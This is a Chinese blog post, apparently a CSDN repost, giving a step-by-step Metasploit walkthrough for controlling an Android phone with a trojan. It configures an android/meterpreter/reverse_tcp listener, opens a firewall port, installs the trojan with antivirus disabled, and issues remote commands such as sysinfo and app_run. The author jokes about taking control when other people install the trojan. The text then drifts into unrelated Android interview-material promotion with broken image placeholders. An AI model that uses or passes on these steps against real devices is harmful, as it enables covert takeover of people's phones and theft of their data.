Centos Linux下使用Metasploit渗透android,h5移动端面试题
作者:互联网
木马生成完毕,msfvenom兄弟的工作就基本完工了,接下来就有请msfconsole上场了,没错,就是打开metasploit的控制台,着手配置相关信息,开始渗透了~
直接输入msfconsole
$ msfconsole
长久看多了单调代码的你,下面的图形代码有没有让你灰色的世界多点点色彩~~
谈正事~我们需要配置什么呢?前面生成木马的时候不是设置了ip和端口吗?现在我们也要在控制台上配置ip和端口,做监听来的
要做的流程大概是这些
(在msfconsole模式下)加载exploit模块
msf > use exploit/multi/handler
(exploit模式下)选择之前我们粘贴过一次的攻击载荷:android/meterpreter/reverse_tcp
msf exploit(multi/handler)> set payload android/meterpreter/reverse_tcp
(exploit模式下)查看一下列表有没有多出你设置的载荷
msf exploit(multi/handler)> show options
(exploit模式下)设置黄色框下的LHOST和LPORT,就设置成之前生成木马搞的ip和端口
顺便放行端口,输入命令firewall-cmd --add-port=3333/tcp
firewall-cmd --add-port=3333/tcp # 开放通过tcp访问3333
配置的流程都搞完了,马上就是渗透了。
群灵觉醒,封印解除,出来吧!exploit
输入命令exploit,开始监控,记住不要关掉,就坐等别人的手机安装,然后别人点击的瞬间,俺这里马上获取到别人手机的控制权,到时候,嘿嘿。当然,俺这里是渗透自己的手机(然并软—~)
既然是渗透自己的手机,把生成的木马拿出来下载吧,俺这里是ftp连接linux成功后,找到木马下载安装到自己的手机上(杀毒软件请关掉),我用的是xftp,只要你能把那个木马拿出来下载,管你用什么办法~~
安装好木马后,点击打开的瞬间,没有啥反应。手机上没反应没关系,关键是终端exploit监听有反应,并且开始渗透并成功。
如果终端没有反应,就是防火墙的问题,设置的端口要放行
输个?,查看命令列表
比如查看下手机信息
sysinfo
想打开某个应用,输入app_list查看app列表
然后使用使用app_run命令打开app对应的package名称
手机上的termux就会自己启动
好了,还有关于相册或者通讯录、照相什么的指令就不讲了,你们自己探究探究吧
尾声
开发是需要一定的基础的,我是08年开始进入Android这行的,在这期间经历了Android的鼎盛时期,和所谓的Android”凉了“。中间当然也有着,不可说的心酸,看着身边朋友,同事一个个转前端,换行业,其实当时我的心也有过犹豫,但是我还是坚持下来了,这次的疫情就是一个好的机会,大浪淘沙,优胜劣汰。再等等,说不定下一个黄金浪潮就被你等到了。
- 330页 PDF Android核心笔记
- 几十套阿里 、字节跳动、腾讯、华为、美团等公司2020年的面试题
- PDF和思维脑图,包含知识脉络 + 诸多细节
- Android进阶系统学习视频
)]
[外链图片转存中…(img-GXRcLSxt-1643529288618)]
- PDF和思维脑图,包含知识脉络 + 诸多细节
[外链图片转存中…(img-mDoMnVIl-1643529288618)]
- Android进阶系统学习视频
[外链图片转存中…(img-9oV5jQOg-1643529288619)]
标签:Metasploit,面试题,Centos,端口,tcp,exploit,木马,手机,Android 来源: https://blog.csdn.net/m0_66264533/article/details/122753502